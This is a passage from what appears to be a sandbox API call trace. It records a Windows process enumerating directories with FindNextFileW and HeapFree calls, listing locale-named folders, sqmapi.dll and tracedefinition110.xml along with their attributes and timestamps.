dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1045", cAlternateFileName="")) returned 1 [0185.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.702] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1887f3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1887f3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1887f3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1046", cAlternateFileName="")) returned 1 [0185.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.702] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a8a2df, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1048", cAlternateFileName="")) returned 1 [0185.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.702] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b87f8e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1049", cAlternateFileName="")) returned 1 [0185.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.702] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc62b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcc62b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1050", cAlternateFileName="")) returned 1 [0185.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.703] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1051", cAlternateFileName="")) returned 1 [0185.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.703] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bd3439, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bd3439, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1053", cAlternateFileName="")) returned 1 [0185.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.703] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf443017d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1054", cAlternateFileName="")) returned 1 [0185.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.703] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1055", cAlternateFileName="")) returned 1 [0185.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.703] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1057", cAlternateFileName="")) returned 1 [0185.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.704] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1058", cAlternateFileName="")) returned 1 [0185.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.704] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1060", cAlternateFileName="")) returned 1 [0185.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.704] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1061", cAlternateFileName="")) returned 1 [0185.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.704] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992fb3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1062", cAlternateFileName="")) returned 1 [0185.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.704] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1063", cAlternateFileName="")) returned 1 [0185.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.705] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1066", cAlternateFileName="")) returned 1 [0185.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.705] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1069", cAlternateFileName="")) returned 1 [0185.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.705] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5afc9d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1081", cAlternateFileName="")) returned 1 [0185.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.705] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a2268a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7abb0bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7abb0bc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1086", cAlternateFileName="")) returned 1 [0185.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.705] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1087", cAlternateFileName="")) returned 1 [0185.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.706] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61fd8b4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1110", cAlternateFileName="")) returned 1 [0185.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.706] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2052", cAlternateFileName="")) returned 1 [0185.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.706] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c40a24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c40a24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2070", cAlternateFileName="")) returned 1 [0185.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.706] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf17ee5c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2074", cAlternateFileName="")) returned 1 [0185.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.706] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0185.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.706] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 1 [0185.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.707] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 0 [0185.707] FindClose (in: hFindFile=0x43a2e18 | out: hFindFile=0x43a2e18) returned 1 [0185.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.707] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0185.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.709] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0185.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.712] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0185.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.715] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0185.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.761] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5612cee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5612cee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5612cee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ae38, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0185.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.764] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0185.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.767] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0185.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.778] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02eb98a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0185.781] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.781] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0185.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.784] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16867e02, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16867e02, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0185.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.786] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16841bb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f913, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracedefinition110.xml", cAlternateFileName="TRACED~1.XML")) returned 1 [0185.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.828] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf164abda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0185.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.831] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0185.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.833] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, 